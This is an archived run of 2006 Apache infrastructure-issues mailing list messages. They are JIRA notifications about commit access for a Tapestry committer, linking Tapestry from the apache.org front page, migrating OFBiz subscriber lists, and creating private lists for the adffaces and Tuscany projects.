X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-856?page=comments#action_12417113 ] Garrett Rooney commented on INFRA-856: -------------------------------------- Well, he has the appropriate access, if he needs his password reset I guess the right approach would be emailing [email protected] and asking them to do it. > karma management access for tapestry > ------------------------------------ > > Key: INFRA-856 > URL: http://issues.apache.org/jira/browse/INFRA-856 > Project: Infrastructure > Type: Wish > Security: public(Regular issues) > Components: Subversion > Environment: minotaur > Reporter: Jesse Kuhnert > > There is currently a committer for tapestry that either doesn't remember his correct password or never had the correct karma access rights to commit on Tapestry. I've done as much homework as I can and pointed out the infrastructure svn repo where ~something~ theoretically exists that either documents how or allows access to karma management. > I don't particularly want to manage it, but also don't want the committer in question to be hindered in their desire to contribute to the project. -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Wed Jun 21 14:05:00 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 54464 invoked from network); 21 Jun 2006 14:04:58 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Jun 2006 14:04:58 -0000 Received: (qmail 11242 invoked by uid 500); 21 Jun 2006 14:04:56 -0000 Delivered-To: [email protected] Received: (qmail 10962 invoked by uid 500); 21 Jun 2006 14:04:55 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 10951 invoked by uid 99); 21 Jun 2006 14:04:55 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 21 Jun 2006 07:04:55 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 21 Jun 2006 07:04:54 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 2BD92410005 for <[email protected]>; Wed, 21 Jun 2006 14:03:30 +0000 (GMT) Message-ID: <3006962.1150898610150.JavaMail.jira@brutus> Date: Wed, 21 Jun 2006 14:03:30 +0000 (GMT+00:00) From: "Jesse Kuhnert (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (INFRA-856) karma management access for tapestry In-Reply-To: <13623744.1150897049768.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-856?page=comments#action_12417114 ] Jesse Kuhnert commented on INFRA-856: ------------------------------------- Ok I will try that. Thank you. > karma management access for tapestry > ------------------------------------ > > Key: INFRA-856 > URL: http://issues.apache.org/jira/browse/INFRA-856 > Project: Infrastructure > Type: Wish > Security: public(Regular issues) > Components: Subversion > Environment: minotaur > Reporter: Jesse Kuhnert > > There is currently a committer for tapestry that either doesn't remember his correct password or never had the correct karma access rights to commit on Tapestry. I've done as much homework as I can and pointed out the infrastructure svn repo where ~something~ theoretically exists that either documents how or allows access to karma management. > I don't particularly want to manage it, but also don't want the committer in question to be hindered in their desire to contribute to the project. -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Wed Jun 21 15:18:58 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 84027 invoked from network); 21 Jun 2006 15:18:57 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Jun 2006 15:18:57 -0000 Received: (qmail 96625 invoked by uid 500); 21 Jun 2006 15:18:56 -0000 Delivered-To: [email protected] Received: (qmail 96363 invoked by uid 500); 21 Jun 2006 15:18:55 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 96352 invoked by uid 99); 21 Jun 2006 15:18:55 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 21 Jun 2006 08:18:55 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 21 Jun 2006 08:18:54 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 6DCC8410005 for <[email protected]>; Wed, 21 Jun 2006 15:17:30 +0000 (GMT) Message-ID: <6630489.1150903050446.JavaMail.jira@brutus> Date: Wed, 21 Jun 2006 15:17:30 +0000 (GMT+00:00) From: "Jesse Kuhnert (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (INFRA-857) create link to tapestry off of main http://www.apache.org index page MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N create link to tapestry off of main http://www.apache.org index page -------------------------------------------------------------------- Key: INFRA-857 URL: http://issues.apache.org/jira/browse/INFRA-857 Project: Infrastructure Type: Task Security: public (Regular issues) Components: Website Environment: minotaur Reporter: Jesse Kuhnert Priority: Minor Me again, I should be out of your hair soon. I'm almost done getting the last remaining items completed to move tapestry out of jakarta and was hoping someone who knew where / how to update the http://apache.org/index.html page might update it for me to point to the new tapestry site at http://tapestry.apache.org. I plan on checking out the jakarta site and removing tapestry (along with a short news announcement ) from the main navigation there after this has been done. -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Thu Jun 22 02:02:04 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 50857 invoked from network); 22 Jun 2006 02:02:01 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 22 Jun 2006 02:02:01 -0000 Received: (qmail 29331 invoked by uid 500); 22 Jun 2006 02:01:57 -0000 Delivered-To: [email protected] Received: (qmail 29129 invoked by uid 500); 22 Jun 2006 02:01:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 29118 invoked by uid 99); 22 Jun 2006 02:01:56 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 21 Jun 2006 19:01:56 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 21 Jun 2006 19:01:55 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 9D841410006 for <[email protected]>; Thu, 22 Jun 2006 02:00:30 +0000 (GMT) Message-ID: <22518756.1150941630642.JavaMail.jira@brutus> Date: Thu, 22 Jun 2006 02:00:30 +0000 (GMT+00:00) From: "Brett Porter (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Closed: (INFRA-857) create link to tapestry off of main http://www.apache.org index page In-Reply-To: <6630489.1150903050446.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-857?page=all ] Brett Porter closed INFRA-857: ------------------------------ Resolution: Fixed Assign To: Brett Porter Howard did this and I updated the site. > create link to tapestry off of main http://www.apache.org index page > -------------------------------------------------------------------- > > Key: INFRA-857 > URL: http://issues.apache.org/jira/browse/INFRA-857 > Project: Infrastructure > Type: Task > Security: public(Regular issues) > Components: Website > Environment: minotaur > Reporter: Jesse Kuhnert > Assignee: Brett Porter > Priority: Minor > > Me again, I should be out of your hair soon. I'm almost done getting the last remaining items completed to move tapestry out of jakarta and was hoping someone who knew where / how to update the http://apache.org/index.html page might update it for me to point to the new tapestry site at http://tapestry.apache.org. > I plan on checking out the jakarta site and removing tapestry (along with a short news announcement ) from the main navigation there after this has been done. -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Thu Jun 22 02:04:07 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 51953 invoked from network); 22 Jun 2006 02:04:05 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 22 Jun 2006 02:04:05 -0000 Received: (qmail 34349 invoked by uid 500); 22 Jun 2006 02:03:58 -0000 Delivered-To: [email protected] Received: (qmail 34069 invoked by uid 500); 22 Jun 2006 02:03:57 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 34011 invoked by uid 99); 22 Jun 2006 02:03:57 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 21 Jun 2006 19:03:57 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 21 Jun 2006 19:03:56 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 73351410006 for <[email protected]>; Thu, 22 Jun 2006 02:02:31 +0000 (GMT) Message-ID: <4138595.1150941751468.JavaMail.jira@brutus> Date: Thu, 22 Jun 2006 02:02:31 +0000 (GMT+00:00) From: "Brett Porter (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Closed: (INFRA-856) karma management access for tapestry In-Reply-To: <13623744.1150897049768.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-856?page=all ] Brett Porter closed INFRA-856: ------------------------------ Resolution: Won't Fix Assign To: Brett Porter please point your PMC chair at: http://www.apache.org/dev/pmc.html#chair > karma management access for tapestry > ------------------------------------ > > Key: INFRA-856 > URL: http://issues.apache.org/jira/browse/INFRA-856 > Project: Infrastructure > Type: Wish > Security: public(Regular issues) > Components: Subversion > Environment: minotaur > Reporter: Jesse Kuhnert > Assignee: Brett Porter > > There is currently a committer for tapestry that either doesn't remember his correct password or never had the correct karma access rights to commit on Tapestry. I've done as much homework as I can and pointed out the infrastructure svn repo where ~something~ theoretically exists that either documents how or allows access to karma management. > I don't particularly want to manage it, but also don't want the committer in question to be hindered in their desire to contribute to the project. -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Thu Jun 22 02:06:06 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 53610 invoked from network); 22 Jun 2006 02:06:04 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 22 Jun 2006 02:06:04 -0000 Received: (qmail 37494 invoked by uid 500); 22 Jun 2006 02:05:59 -0000 Delivered-To: [email protected] Received: (qmail 37018 invoked by uid 500); 22 Jun 2006 02:05:58 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 36917 invoked by uid 99); 22 Jun 2006 02:05:57 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 21 Jun 2006 19:05:57 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 21 Jun 2006 19:05:57 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 030D8410006 for <[email protected]>; Thu, 22 Jun 2006 02:04:32 +0000 (GMT) Message-ID: <7547668.1150941872009.JavaMail.jira@brutus> Date: Thu, 22 Jun 2006 02:04:32 +0000 (GMT+00:00) From: "Brett Porter (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (INFRA-856) karma management access for tapestry In-Reply-To: <13623744.1150897049768.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-856?page=comments#action_12417231 ] Brett Porter commented on INFRA-856: ------------------------------------ oops, I hadn't read the latter comments on this before commenting > karma management access for tapestry > ------------------------------------ > > Key: INFRA-856 > URL: http://issues.apache.org/jira/browse/INFRA-856 > Project: Infrastructure > Type: Wish > Security: public(Regular issues) > Components: Subversion > Environment: minotaur > Reporter: Jesse Kuhnert > Assignee: Brett Porter > > There is currently a committer for tapestry that either doesn't remember his correct password or never had the correct karma access rights to commit on Tapestry. I've done as much homework as I can and pointed out the infrastructure svn repo where ~something~ theoretically exists that either documents how or allows access to karma management. > I don't particularly want to manage it, but also don't want the committer in question to be hindered in their desire to contribute to the project. -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Thu Jun 22 06:28:10 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 31747 invoked from network); 22 Jun 2006 06:28:09 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 22 Jun 2006 06:28:09 -0000 Received: (qmail 98162 invoked by uid 500); 22 Jun 2006 06:28:04 -0000 Delivered-To: [email protected] Received: (qmail 97647 invoked by uid 500); 22 Jun 2006 06:28:02 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 97539 invoked by uid 99); 22 Jun 2006 06:28:02 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 21 Jun 2006 23:28:02 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 21 Jun 2006 23:28:01 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id ABFDE410007 for <[email protected]>; Thu, 22 Jun 2006 06:26:33 +0000 (GMT) Message-ID: <27426046.1150957593701.JavaMail.jira@brutus> Date: Thu, 22 Jun 2006 06:26:33 +0000 (GMT+00:00) From: "David E. Jones (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (INFRA-738) Create initial subscriber list for OFBiz lists, using input from OFBiz project In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-738?page=comments#action_12417251 ] David E. Jones commented on INFRA-738: -------------------------------------- Okay, I have a tgz file with the subscriber lists for the current OFBiz subscribers. I'm guessing it's probably best not to attach it here, people might not appreciate that. Who can I send it to, ie who can auto-subscribe the addresses in the files? They are simple text files with one email address per line. > Create initial subscriber list for OFBiz lists, using input from OFBiz project > ------------------------------------------------------------------------------ > > Key: INFRA-738 > URL: http://issues.apache.org/jira/browse/INFRA-738 > Project: Infrastructure > Type: Task > Security: public(Regular issues) > Components: Mailing Lists > Reporter: David N. Welton > > Hi, > The OFBiz guys will need to move their subscribers over to the newly created lists (thanks for taking care of that!). This will need to be coordinated with them so that a time window is found when they can generate the list of subscribers, send it, and then have the new lists 'go live'. Also, I imagine the subscriber list can just be a .txt file with a list of email addresses - is that correct? > Thanks, > Dave -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Thu Jun 22 06:37:03 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 34430 invoked from network); 22 Jun 2006 06:37:01 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 22 Jun 2006 06:37:01 -0000 Received: (qmail 4607 invoked by uid 500); 22 Jun 2006 06:36:58 -0000 Delivered-To: [email protected] Received: (qmail 4336 invoked by uid 500); 22 Jun 2006 06:36:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 4324 invoked by uid 99); 22 Jun 2006 06:36:56 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 21 Jun 2006 23:36:56 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 21 Jun 2006 23:36:56 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 9B8287141E9 for <[email protected]>; Thu, 22 Jun 2006 06:35:30 +0000 (GMT) Message-ID: <11794572.1150958130634.JavaMail.jira@brutus> Date: Thu, 22 Jun 2006 06:35:30 +0000 (GMT+00:00) From: "Brett Porter (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (INFRA-738) Create initial subscriber list for OFBiz lists, using input from OFBiz project In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-738?page=comments#action_12417253 ] Brett Porter commented on INFRA-738: ------------------------------------ David, I can help with this ([email protected]). If you'd prefer to do this over IRC (#asfinfra on freenode) or an instant messenger (brettporter on yahoo and skype) that's fine too as we can make sure it is done in close timing. > Create initial subscriber list for OFBiz lists, using input from OFBiz project > ------------------------------------------------------------------------------ > > Key: INFRA-738 > URL: http://issues.apache.org/jira/browse/INFRA-738 > Project: Infrastructure > Type: Task > Security: public(Regular issues) > Components: Mailing Lists > Reporter: David N. Welton > > Hi, > The OFBiz guys will need to move their subscribers over to the newly created lists (thanks for taking care of that!). This will need to be coordinated with them so that a time window is found when they can generate the list of subscribers, send it, and then have the new lists 'go live'. Also, I imagine the subscriber list can just be a .txt file with a list of email addresses - is that correct? > Thanks, > Dave -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Thu Jun 22 20:57:02 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 41470 invoked from network); 22 Jun 2006 20:57:00 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 22 Jun 2006 20:57:00 -0000 Received: (qmail 62495 invoked by uid 500); 22 Jun 2006 20:56:58 -0000 Delivered-To: [email protected] Received: (qmail 62238 invoked by uid 500); 22 Jun 2006 20:56:57 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 62216 invoked by uid 99); 22 Jun 2006 20:56:56 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 22 Jun 2006 13:56:56 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 22 Jun 2006 13:56:56 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id C2029410005 for <[email protected]>; Thu, 22 Jun 2006 20:55:29 +0000 (GMT) Message-ID: <13565727.1151009729770.JavaMail.jira@brutus> Date: Thu, 22 Jun 2006 20:55:29 +0000 (GMT+00:00) From: =?utf-8?Q?Matthias_We=C3=9Fendorf_=28JIRA=29?= <[email protected]> To: [email protected] Subject: [jira] Created: (INFRA-858) Private list for adffaces project MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Private list for adffaces project --------------------------------- Key: INFRA-858 URL: http://issues.apache.org/jira/browse/INFRA-858 Project: Infrastructure Type: Task Security: public (Regular issues)=20 Reporter: Matthias We=C3=9Fendorf The adffaces incubation project does not have a private/ppmc list for discu= ssion of things like new committers. Please can we create a list for that w= ith the archive visible to adffaces committers (adffaces group). The current lists are under ws e.g. [email protected] Please can you create [email protected] Please add matzew and/or craigmcc as a moderator for the new list with the = ability to add other subscribers. Is it possible to pre-subscribe all adffa= ces committers or should they send in subscription requests? --=20 This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Thu Jun 22 23:30:05 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 82344 invoked from network); 22 Jun 2006 23:30:02 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 22 Jun 2006 23:30:02 -0000 Received: (qmail 76086 invoked by uid 500); 22 Jun 2006 23:29:59 -0000 Delivered-To: [email protected] Received: (qmail 75814 invoked by uid 500); 22 Jun 2006 23:29:58 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 75789 invoked by uid 99); 22 Jun 2006 23:29:57 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 22 Jun 2006 16:29:57 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 22 Jun 2006 16:29:57 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id A4F1C410007 for <[email protected]>; Thu, 22 Jun 2006 23:28:30 +0000 (GMT) Message-ID: <786044.1151018910672.JavaMail.jira@brutus> Date: Thu, 22 Jun 2006 23:28:30 +0000 (GMT+00:00) From: "Brett Porter (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Assigned: (INFRA-839) Private list for Tuscany project In-Reply-To: <12820429.1149796289765.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-839?page=all ] Brett Porter reassigned INFRA-839: ---------------------------------- Assign To: Brett Porter > Private list for Tuscany project > -------------------------------- > > Key: INFRA-839 > URL: http://issues.apache.org/jira/browse/INFRA-839 > Project: Infrastructure > Type: Task > Security: public(Regular issues) > Components: Mailing Lists > Reporter: Jeremy Boynes > Assignee: Brett Porter > > The Tuscany project does not have a private/ppmc list for discussion of things like new committers. Please can we create a list for that with the archive visible to tuscany committers (ws-tuscany group I believe). > The current lists are under ws e.g. [email protected] > Please can you create > [email protected] > or > [email protected] > as appropriate. > Please add jboynes as a moderator for the new list with the ability to add other subscribers. Is it possible to pre-subscribe all Tuscany committers or should they send in subscription requests? -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Thu Jun 22 23:30:07 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 82872 invoked from network); 22 Jun 2006 23:30:06 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 22 Jun 2006 23:30:06 -0000 Received: (qmail 76594 invoked by uid 500); 22 Jun 2006 23:30:04 -0000 Delivered-To: [email protected] Received: (qmail 76251 invoked by uid 500); 22 Jun 2006 23:30:01 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 76108 invoked by uid 99); 22 Jun 2006 23:29:59 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 22 Jun 2006 16:29:59 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 22 Jun 2006 16:29:58 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 08D0A41000A for <[email protected]>; Thu, 22 Jun 2006 23:28:32 +0000 (GMT) Message-ID: <3900350.1151018912033.JavaMail.jira@brutus> Date: Thu, 22 Jun 2006 23:28:32 +0000 (GMT+00:00) From: "Brett Porter (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Assigned: (INFRA-858) Private list for adffaces project In-Reply-To: <13565727.1151009729770.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-858?page=3Dall ] Brett Porter reassigned INFRA-858: ---------------------------------- Assign To: Brett Porter > Private list for adffaces project > --------------------------------- > > Key: INFRA-858 > URL: http://issues.apache.org/jira/browse/INFRA-858 > Project: Infrastructure > Type: Task > Security: public(Regular issues)=20 > Reporter: Matthias We=C3=9Fendorf > Assignee: Brett Porter > > The adffaces incubation project does not have a private/ppmc list for dis= cussion of things like new committers. Please can we create a list for that= with the archive visible to adffaces committers (adffaces group). > The current lists are under ws e.g. [email protected] > Please can you create > [email protected] > Please add matzew and/or craigmcc as a moderator for the new list with th= e ability to add other subscribers. Is it possible to pre-subscribe all adf= faces committers or should they send in subscription requests? --=20 This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Fri Jun 23 00:43:02 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 96261 invoked from network); 23 Jun 2006 00:43:01 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Jun 2006 00:43:01 -0000 Received: (qmail 38387 invoked by uid 500); 23 Jun 2006 00:42:58 -0000 Delivered-To: [email protected] Received: (qmail 38159 invoked by uid 500); 23 Jun 2006 00:42:58 -0000 Mailing-List: contact [email protected]; run by 